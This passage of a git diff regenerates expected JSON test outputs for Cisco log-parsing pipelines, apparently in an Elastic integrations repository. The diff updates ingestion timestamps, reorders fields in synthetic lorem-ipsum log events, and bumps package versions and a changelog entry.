"2021-12-09T13:33:18.888590900Z" + "ingested": "2021-12-14T14:38:02.304910929Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "unte 1509620741.uamnihil llam_appliance events MAC 01:00:5e:ee:1d:77 and MAC 01:00:5e:f1:21:bd both claim IP: 10.94.88.5", "event": { - "ingested": "2021-12-09T13:33:18.888596Z" + "ingested": "2021-12-14T14:38:02.304911441Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "esci 1510855695.uov quaeab_ events IDS: moles", "event": { - "ingested": "2021-12-09T13:33:18.888601100Z" + "ingested": "2021-12-14T14:38:02.304911850Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "accusa 1512090649.natu liquid events IDS: enim", "event": { - "ingested": "2021-12-09T13:33:18.888606300Z" + "ingested": "2021-12-14T14:38:02.304912241Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "dquiaco nibus.vitaed ser security_event etconsec signature=elillum priority=upt timestamp=1513325604.rnat dhost=01:00:5e:01:60:e0 direction=internal protocol=ipv6 src=10.90.99.245 dst=10.124.63.4 message:pta", "event": { - "ingested": "2021-12-09T13:33:18.888611500Z" + "ingested": "2021-12-14T14:38:02.304912625Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tetura 1514560558.imadmini moe_appliance events content_filtering_block url='https://mail.example.net/uat/lupta.html?uptassit=ncidi#tlabori' category0='laudan' server='10.249.7.146:2010'", "event": { - "ingested": "2021-12-09T13:33:18.888615500Z" + "ingested": "2021-12-14T14:38:02.304913013Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": 
"1.12.0" - }, "message": "lapar 1515795512.ritati edquia_appliance events IDS: itesse", "event": { - "ingested": "2021-12-09T13:33:18.888618600Z" + "ingested": "2021-12-14T14:38:02.304913531Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "amvolu mip.tion tobeatae_ security_event Utenima security_event iqua signature=luptat priority=deriti timestamp=1517030466.sintocc dhost=01:00:5e:c9:b7:22 direction=inbound protocol=icmp src=10.196.96.162 dst=10.81.234.34 message:equuntur", "event": { - "ingested": "2021-12-09T13:33:18.888622900Z" + "ingested": "2021-12-14T14:38:02.304913909Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "uide 1518265421.scivel henderi_appliance events IDS: iusmodt", "event": { - "ingested": "2021-12-09T13:33:18.888627600Z" + "ingested": "2021-12-14T14:38:02.304914287Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tiumd 1519500375.ntmoll mexer events dhcp lease of ip 10.40.101.224 from server mac 01:00:5e:0a:df:72 for client mac 01:00:5e:7c:01:ab with hostname remips188.api.invalid from router 10.78.199.43 on subnet ehender with dns ilmole", "event": { - "ingested": "2021-12-09T13:33:18.888632Z" + "ingested": "2021-12-14T14:38:02.304914662Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "runtmo 1520735329.ore isund_appliance events MAC 01:00:5e:17:87:3e and MAC 01:00:5e:5f:c1:3e both claim IP: 10.244.29.119", "event": { - "ingested": "2021-12-09T13:33:18.888635600Z" + "ingested": "2021-12-14T14:38:02.304915045Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tutlabor 1521970284.reseosq gna_ flows pteurs flows deny 
src=10.83.131.245 dst=10.39.172.93 mac=01:00:5e:c4:12:c7 protocol=udp type=uido ", "event": { - "ingested": "2021-12-09T13:33:18.888639700Z" + "ingested": "2021-12-14T14:38:02.304915427Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "osquira 1523205238.umd sciveli_ events dhcp lease of ip 10.86.188.179 from server mac 01:00:5e:48:4b:78 for client mac 01:00:5e:7e:cd:15 from router 10.201.168.116 on subnet umiure with dns laborum", "event": { - "ingested": "2021-12-09T13:33:18.888643600Z" + "ingested": "2021-12-14T14:38:02.304915812Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "umdolors 1524440192.lumdo acom_ security_event umexercisecurity_event duntut url=https://mail.example.com/prehend/eufug.htm?eufug=est#civelits src=10.148.211.222:2053 dst=10.122.204.151:3903 mac=01:00:5e:c3:a0:dc name=ine sha256=urerepre disposition=asnulap action=deny", "event": { - "ingested": "2021-12-09T13:33:18.888647200Z" + "ingested": "2021-12-14T14:38:02.304916197Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "atnul 1525675146.umfugi stquidol_ flows luptatem flows accept", "event": { - "ingested": "2021-12-09T13:33:18.888651300Z" + "ingested": "2021-12-14T14:38:02.304916603Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "essequam ueporro.aliqu upt ids-alerts signature=orum priority=Bonoru timestamp=1526910101.madminimprotocol=ipv6-icmp src=10.97.46.16 dst=10.120.4.9message: teni", "event": { - "ingested": "2021-12-09T13:33:18.888654800Z" + "ingested": "2021-12-14T14:38:02.304916996Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "lorsitam tanimid.onpr 
litseddo_ ids-alerts oremqu ids-alerts signature=idex priority=radip timestamp=1528145055.uptaprotocol=ipv6-icmp src=10.171.206.139 dst=10.165.173.162message: lestia", "event": { - "ingested": "2021-12-09T13:33:18.888659100Z" + "ingested": "2021-12-14T14:38:02.304917383Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inibusB 1529380009.nostrud cteturad events dhcp lease of ip 10.150.163.151 from server mac 01:00:5e:72:b7:79 for client mac 01:00:5e:f2:d3:12 with hostname uames4985.mail.localdomain from router 10.144.57.239 on subnet oinBCSed with dns orem", "event": { - "ingested": "2021-12-09T13:33:18.888664300Z" + "ingested": "2021-12-14T14:38:02.304917767Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "eritq rehen.ipsamvol elillum_ ids-alerts tco ids-alerts signature=tvol priority=oluptate timestamp=1530614963.lit shost=01:00:5e:ac:6d:d3 direction=unknown protocol=igmp src=10.52.202.158 dst=10.54.44.231 message: Ute", "event": { - "ingested": "2021-12-09T13:33:18.888669500Z" + "ingested": "2021-12-14T14:38:02.304918189Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "runtm 1531849918.eturadip olorsi_ events MAC 01:00:5e:67:1d:0f and MAC 01:00:5e:f0:a9:cd both claim IP: 10.101.183.86", "event": { - "ingested": "2021-12-09T13:33:18.888674700Z" + "ingested": "2021-12-14T14:38:02.304918580Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inesciu 1533084872.quid atcupid_ flows orem flows src=10.71.22.225 dst=10.4.76.100 protocol=ggp pattern: allow serrorsi", "event": { - "ingested": "2021-12-09T13:33:18.888679800Z" + "ingested": "2021-12-14T14:38:02.304918963Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ 
"preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "lamco 1534319826.cit siar events MAC 01:00:5e:80:cd:ca and MAC 01:00:5e:45:aa:51 both claim IP: 10.83.130.95", "event": { - "ingested": "2021-12-09T13:33:18.888685Z" + "ingested": "2021-12-14T14:38:02.304919350Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "hite 1535554780.ianonnum nofdeFi events aid=henderit arp_resp=remq arp_src=unt auth_neg_dur=tla auth_neg_failed=arch channel=lite dns_req_rtt=ugia dns_resp=meum dns_server=borumSec duration=91.439000 full_conn=nvolupta identity=tev ip_resp=nre ip_src=10.2.110.73 is_8021x=eturadip is_wpa=ent last_auth_ago=rumSecti radio=Utenima reason=olore rssi=orumS type=olor vap=radip client_mac=01:00:5e:59:bf:36 client_ip=10.230.98.81 instigator=aaliquaU http_resp=olu dhcp_lease_completed=iameaque dhcp_ip=identsun dhcp_server=ender dhcp_server_mac=inc dhcp_resp=tect url=https://www.example.net/doconse/eni.html?mSec=smoditem#tatisetq category0=uidolo server=10.103.49.129 vpn_type=oquisq connectivity=abori", "event": { - "ingested": "2021-12-09T13:33:18.888690100Z" + "ingested": "2021-12-14T14:38:02.304919728Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "dunt 1536789735.ames amni events aid=tatio arp_resp=amquisno arp_src=modoc auth_neg_dur=magnam auth_neg_failed=uinesc channel=cid dns_req_rtt=emi dns_resp=Bonorum dns_server=lesti duration=59.289000 full_conn=iosamni identity=idu ip_resp=sis ip_src=10.158.61.228 is_8021x=tsedquia is_wpa=its last_auth_ago=umdolor radio=isiu reason=assi rssi=eserun type=rvelill vap=lupta client_mac=01:00:5e:e6:a6:a2 client_ip=10.186.16.20 instigator=tisu http_resp=remagnam dhcp_lease_completed=nvolupt dhcp_ip=meiusm dhcp_server=nidolo dhcp_server_mac=atquovol dhcp_resp=quunt url=https://www.example.com/seq/moll.htm?sunt=dquianon#urExc 
category0=tDuis server=10.132.176.96 vpn_type=aria connectivity=inim", "event": { - "ingested": "2021-12-09T13:33:18.888695300Z" + "ingested": "2021-12-14T14:38:02.304920117Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "oremeumf 1538024689.lesti sintocca events dhcp lease of ip 10.105.136.146 from server mac 01:00:5e:bb:aa:f6 for client mac 01:00:5e:69:92:4a with hostname lors2232.api.example from router 10.46.217.155 on subnet amnihil with dns orissus", "event": { - "ingested": "2021-12-09T13:33:18.888700400Z" + "ingested": "2021-12-14T14:38:02.304920501Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "nimadmin 1539259643.lumqui quiavolu flows src=10.245.199.23 dst=10.123.62.215 mac=01:00:5e:1f:7f:1d protocol=udp pattern: 0 iusmodt", "event": { - "ingested": "2021-12-09T13:33:18.888705500Z" + "ingested": "2021-12-14T14:38:02.304920905Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "rep 1540494597.remap deri flows cancel src=10.239.105.121 dst=10.70.7.23 mac=01:00:5e:8e:82:f0 protocol=ipv6 ", "event": { - "ingested": "2021-12-09T13:33:18.888710600Z" + "ingested": "2021-12-14T14:38:02.304921287Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "idexeac 1541729552.nimadmin midest_appliance events aid=modt arp_resp=iduntutl arp_src=rsitam auth_neg_dur=xercit auth_neg_failed=ulpaquio channel=itqu dns_req_rtt=minimav dns_resp=smodtem dns_server=roquisqu duration=116.294000 full_conn=iquid identity=evo ip_resp=mcorpori ip_src=10.196.176.243 is_8021x=itesse is_wpa=expl last_auth_ago=essecill radio=totamre reason=rpo rssi=velites type=nonpro vap=nula client_mac=01:00:5e:99:a6:b4 client_ip=10.90.50.149 instigator=nemulla 
http_resp=asp dhcp_lease_completed=dexercit dhcp_ip=amn dhcp_server=itessequ dhcp_server_mac=porissu dhcp_resp=umd url=https://www.example.net/sectetur/edquian.html?turQuis=taevi#uames category0=tconsec server=10.16.230.121 vpn_type=laboree connectivity=udantiu", "event": { - "ingested": "2021-12-09T13:33:18.888715800Z" + "ingested": "2021-12-14T14:38:02.304921709Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ttenb olor.quiav gna security_event Nem signature=tdolorem priority=eacomm timestamp=1542964506.upidata dhost=01:00:5e:6a:c8:f8 direction=unknown protocol=ipv6 src=10.246.152.72:4293 dst=10.34.62.190:1641 message:eve", "event": { - "ingested": "2021-12-09T13:33:18.888721Z" + "ingested": "2021-12-14T14:38:02.304922082Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "quisn 1544199460.rem ulamcola events dhcp no offers for mac 01:00:5e:67:fc:cb", "event": { - "ingested": "2021-12-09T13:33:18.888726200Z" + "ingested": "2021-12-14T14:38:02.304922518Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "eruntmo 1545434414.nimve usanti_ events dhcp release for mac 01:00:5e:7d:de:f7", "event": { - "ingested": "2021-12-09T13:33:18.888731600Z" + "ingested": "2021-12-14T14:38:02.304923062Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "uatu 1546669369.olupta consequu_ events dhcp release for mac 01:00:5e:6b:96:f2", "event": { - "ingested": "2021-12-09T13:33:18.888736900Z" + "ingested": "2021-12-14T14:38:02.304923475Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "sitam inibusBo.illoin emUtenim ids-alerts signature=ende priority=dexea 
timestamp=1547904323.acoprotocol=ipv6 src=10.244.32.189 dst=10.121.9.5message: uptas", "event": { - "ingested": "2021-12-09T13:33:18.888742100Z" + "ingested": "2021-12-14T14:38:02.304923855Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "edol 1549139277.sequuntu quameius_ events content_filtering_block url='https://www.example.com/totamrem/aliqu.htm?sBonorum=moenimi#lor' category0='auto' server='10.41.124.15:333'", "event": { - "ingested": "2021-12-09T13:33:18.888747300Z" + "ingested": "2021-12-14T14:38:02.304924252Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "antium 1550374232.remaper eseosq events dhcp no offers for mac 01:00:5e:c3:77:27", "event": { - "ingested": "2021-12-09T13:33:18.888751200Z" + "ingested": "2021-12-14T14:38:02.304924636Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "oditau 1551609186.onsec dit events MAC 01:00:5e:19:86:21 and MAC 01:00:5e:ed:ed:79 both claim IP: 10.43.235.230", "event": { - "ingested": "2021-12-09T13:33:18.888755500Z" + "ingested": "2021-12-14T14:38:02.304925049Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "asper dictasun.psa lorese_ ids-alerts ctobeat ids-alerts signature=onsec priority=idestl timestamp=1552844140.litani shost=01:00:5e:a0:b2:c9 direction=unknown protocol=icmp src=10.199.19.205:5823 dst=10.103.91.159:7116 message: ntut", "event": { - "ingested": "2021-12-09T13:33:18.888760100Z" + "ingested": "2021-12-14T14:38:02.304925434Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "estiaec 1554079094.pitlabo tas_appliance flows src=10.17.111.91 dst=10.65.0.157 mac=01:00:5e:49:c4:17 
protocol=udp pattern: 1 nostrum", "event": { - "ingested": "2021-12-09T13:33:18.888936800Z" + "ingested": "2021-12-14T14:38:02.304925820Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ercitati 1555314049.atem serro flows cancel", "event": { - "ingested": "2021-12-09T13:33:18.888940Z" + "ingested": "2021-12-14T14:38:02.304926200Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "amquaera 1556549003.rsitamet leumiur events MAC 01:00:5e:fd:79:9e and MAC 01:00:5e:4d:c0:dd both claim IP: 10.20.130.88", "event": { - "ingested": "2021-12-09T13:33:18.888945Z" + "ingested": "2021-12-14T14:38:02.304926605Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "abill ametcon.ofdeFini tasnu_ ids-alerts tionev ids-alerts signature=uasiarch priority=velites timestamp=1557783957.uredolorprotocol=ipv6 src=10.177.64.152 dst=10.140.242.86message: temporin", "event": { - "ingested": "2021-12-09T13:33:18.888949500Z" + "ingested": "2021-12-14T14:38:02.304927048Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "lor nvolupt.dquia ora_ security_event dipi security_event ecatc signature=quovolu priority=ite timestamp=1559018911.itse shost=01:00:5e:b8:73:c8 direction=external protocol=icmp src=10.199.103.185:2449 dst=10.51.121.223:24 message:stenat", "event": { - "ingested": "2021-12-09T13:33:18.888954Z" + "ingested": "2021-12-14T14:38:02.304927430Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "saq 1560253866.asiarch ssuscipi events MAC 01:00:5e:93:48:61 and MAC 01:00:5e:21:c2:55 both claim IP: 10.126.242.58", "event": { - "ingested": "2021-12-09T13:33:18.888957600Z" + 
"ingested": "2021-12-14T14:38:02.304927814Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tlab 1561488820.vel ionevo events dhcp release for mac 01:00:5e:8a:1a:f9", "event": { - "ingested": "2021-12-09T13:33:18.888962Z" + "ingested": "2021-12-14T14:38:02.304928196Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "aeab 1562723774.uradipis aerat_ flows uira flows deny src=10.121.37.244 dst=10.113.152.241 mac=01:00:5e:9c:86:62 protocol=udp type=utaliqui ", "event": { - "ingested": "2021-12-09T13:33:18.888966100Z" + "ingested": "2021-12-14T14:38:02.304928580Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "nesciu 1563958728.mali roinBCSe_appliance events aid=eetdolor arp_resp=tpersp arp_src=assi auth_neg_dur=rch auth_neg_failed=psa channel=nreprehe dns_req_rtt=pidatatn dns_resp=isno dns_server=luptatev duration=39.622000 full_conn=lla identity=urau ip_resp=aeca ip_src=10.247.118.132 is_8021x=atcupi is_wpa=enima last_auth_ago=uptateve radio=fugitsed reason=lumqui rssi=ectet type=ionu vap=eratv client_mac=01:00:5e:10:8b:c3 client_ip=10.153.33.99 instigator=liq http_resp=xerc dhcp_lease_completed=atisetqu dhcp_ip=squir dhcp_server=gnaaliq dhcp_server_mac=quam dhcp_resp=deriti url=https://www5.example.org/eturadi/umS.txt?mSecti=henderi#taevitae category0=tevel server=10.254.96.130 vpn_type=ita connectivity=iquipexe", "event": { - "ingested": "2021-12-09T13:33:18.888970500Z" + "ingested": "2021-12-14T14:38:02.304928970Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tot 1565193683.reme emeumfu events aid=inBCSedu arp_resp=ita arp_src=ade auth_neg_dur=nihilmol auth_neg_failed=nder channel=ano dns_req_rtt=rumexer dns_resp=eab 
dns_server=iaconseq duration=18.963000 full_conn=eli identity=rissusci ip_resp=ectetur ip_src=10.101.13.122 is_8021x=oconsequ is_wpa=roqui last_auth_ago=oluptate radio=ntut reason=mremaper rssi=uteirur type=ntium vap=ide client_mac=01:00:5e:95:ae:d0 client_ip=10.78.143.52 instigator=ntiumdol http_resp=conse dhcp_lease_completed=aturve dhcp_ip=edqui dhcp_server=tvolu dhcp_server_mac=psu dhcp_resp=strud url=https://internal.example.org/fdeFi/ratv.htm?sequatu=tiumtot#tate category0=udanti server=10.200.98.243 vpn_type=cteturad connectivity=umq", "event": { - "ingested": "2021-12-09T13:33:18.888976Z" + "ingested": "2021-12-14T14:38:02.304929351Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "oinvento 1566428637.mporin orissusc_appliance events content_filtering_block url='https://www5.example.net/uov/pariat.htm?litsed=lumd#tiaec' category0='lorem' server='10.247.205.185:7676' client_mac='01:00:5e:6f:21:c8'", "event": { - "ingested": "2021-12-09T13:33:18.888980700Z" + "ingested": "2021-12-14T14:38:02.304929739Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "metMa emoen.ptate mipsumqu_ ids-alerts ccusa ids-alerts signature=billo priority=doloremi timestamp=1567663591.ectetura dhost=01:00:5e:0a:88:bb direction=inbound protocol=ipv6 src=10.195.90.73:3914 dst=10.147.165.30:7662 message: idents", "event": { - "ingested": "2021-12-09T13:33:18.888983900Z" + "ingested": "2021-12-14T14:38:02.304930126Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "veniamqu 1568898545.iconsequ ueporr_appliance events IDS: empor", "event": { - "ingested": "2021-12-09T13:33:18.888988Z" + "ingested": "2021-12-14T14:38:02.304930522Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": 
"1.12.0" - }, "message": "atDuisa mipsa.uas iat ids-alerts signature=hite priority=adipis timestamp=1570133500.abo dhost=01:00:5e:dd:cb:5b direction=inbound protocol=udp src=10.137.166.97 dst=10.162.202.14 message: ipsaqua", "event": { - "ingested": "2021-12-09T13:33:18.888993200Z" + "ingested": "2021-12-14T14:38:02.304930916Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "deom 1571368454.tiumdo rautod_appliance events content_filtering_block url='https://www5.example.com/illoinve/etcon.htm?nevolup=erspici#itinvolu' category0='adeserun' server='10.227.135.142:6598'", "event": { - "ingested": "2021-12-09T13:33:18.888998300Z" + "ingested": "2021-12-14T14:38:02.304931326Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "orese 1572603408.umdolore umqui_appliance events MAC 01:00:5e:f1:b8:3a and MAC 01:00:5e:37:9c:af both claim IP: 10.199.29.19", "event": { - "ingested": "2021-12-09T13:33:18.889002Z" + "ingested": "2021-12-14T14:38:02.304931717Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "explicab 1573838362.samvolu teiru_appliance events dhcp no offers for mac 01:00:5e:b8:06:92", "event": { - "ingested": "2021-12-09T13:33:18.889006100Z" + "ingested": "2021-12-14T14:38:02.304932105Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "rissusci 1575073317.uaturQ iusmod_ events aid=mips arp_resp=iduntutl arp_src=mipsumd auth_neg_dur=eiusmo auth_neg_failed=quelauda channel=rcit dns_req_rtt=dolo dns_resp=ulamc dns_server=doe duration=10.574000 full_conn=remquela identity=toreve ip_resp=squirat ip_src=10.85.59.172 is_8021x=mto is_wpa=iae last_auth_ago=dent radio=Uten reason=tatiset rssi=sequat type=modoco vap=beataevi 
client_mac=01:00:5e:92:d8:95 client_ip=10.158.215.216 instigator=deritin http_resp=ptate dhcp_lease_completed=lloi dhcp_ip=nseq dhcp_server=equunt dhcp_server_mac=tutla dhcp_resp=usmod url=https://example.com/qui/itse.gif?orsitame=tasn#exeaco category0=upta server=10.75.122.111 vpn_type=reprehe connectivity=deFinib", "event": { - "ingested": "2021-12-09T13:33:18.889011200Z" + "ingested": "2021-12-14T14:38:02.304932498Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "orr 1576308271.pre aute events IDS: rchite", "event": { - "ingested": "2021-12-09T13:33:18.889015300Z" + "ingested": "2021-12-14T14:38:02.304932891Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" diff --git a/packages/cisco/manifest.yml b/packages/cisco/manifest.yml index 2ea35bb6595..486f9be6ad4 100644 --- a/packages/cisco/manifest.yml +++ b/packages/cisco/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: cisco title: Cisco -version: 0.12.4 +version: 0.12.5 license: basic description: Deprecated. Use a specific Cisco package instead. type: integration diff --git a/packages/cisco_asa/changelog.yml b/packages/cisco_asa/changelog.yml index 38d06dc133f..9268b015ed1 100644 --- a/packages/cisco_asa/changelog.yml +++ b/packages/cisco_asa/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.3.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.3.1" changes: - description: Change test public IPs to the supported subset diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-additional-messages.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-additional-messages.log-expected.json index 6e288f1f5ac..975e78e64c0 100644 
--- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-additional-messages.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-additional-messages.log-expected.json @@ -63,7 +63,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615291700Z", + "ingested": "2021-12-14T14:38:14.656554271Z", "original": "May 5 17:51:17 dev01: %FTD-6-302013: Built inbound TCP connection 111111111 for net:10.10.10.10/53500 (81.2.69.144/53500) to fw111:192.168.2.2/53500 (81.2.69.144/53500)", "code": "302013", "kind": "event", @@ -150,7 +150,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615295400Z", + "ingested": "2021-12-14T14:38:14.656556438Z", "original": "May 5 17:51:17 dev01: %FTD-6-302015: Built inbound UDP connection 111111111 for net:10.10.10.10/53500 (81.2.69.144/53500) to fw111:192.168.2.2/53500 (81.2.69.144/53500)", "code": "302015", "kind": "event", @@ -221,7 +221,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615300100Z", + "ingested": "2021-12-14T14:38:14.656556875Z", "original": "May 5 17:51:17 dev01: %FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 81.2.69.144/0 laddr 192.168.2.2/0 type 3 code 3", "code": "302020", "kind": "event", @@ -243,16 +243,6 @@ } }, { - "log": { - "level": "debug" - }, - "source": { - "address": "192.168.2.2", - "ip": "192.168.2.2" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "ingress": { "interface": { @@ -276,13 +266,20 @@ "192.168.2.2" ] }, + "log": { + "level": "debug" + }, "host": { "hostname": "dev01" }, + "source": { + "address": "192.168.2.2", + "ip": "192.168.2.2" + }, "event": { "severity": 7, "duration": 0, - "ingested": "2021-12-09T13:33:30.615304900Z", + "ingested": "2021-12-14T14:38:14.656557312Z", "original": "May 5 17:51:17 dev01: %FTD-7-609002: Teardown local-host net:192.168.2.2 duration 0:00:00", "code": "609002", "kind": "event", 
@@ -301,19 +298,12 @@ "asa": { "source_interface": "net" } - } - }, - { - "log": { - "level": "debug" - }, - "source": { - "address": "192.168.2.2", - "ip": "192.168.2.2" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "ingress": { "interface": { @@ -337,12 +327,19 @@ "192.168.2.2" ] }, + "log": { + "level": "debug" + }, "host": { "hostname": "dev01" }, + "source": { + "address": "192.168.2.2", + "ip": "192.168.2.2" + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:30.615308900Z", + "ingested": "2021-12-14T14:38:14.656557671Z", "original": "May 5 17:51:17 dev01: %FTD-7-609001: Built local-host net:192.168.2.2", "code": "609001", "kind": "event", @@ -359,7 +356,10 @@ "asa": { "source_interface": "net" } - } + }, + "tags": [ + "preserve_original_event" + ] }, { "log": { @@ -408,7 +408,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615312700Z", + "ingested": "2021-12-14T14:38:14.656558035Z", "original": "May 5 17:51:17 dev01: %FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 81.2.69.144/0 laddr 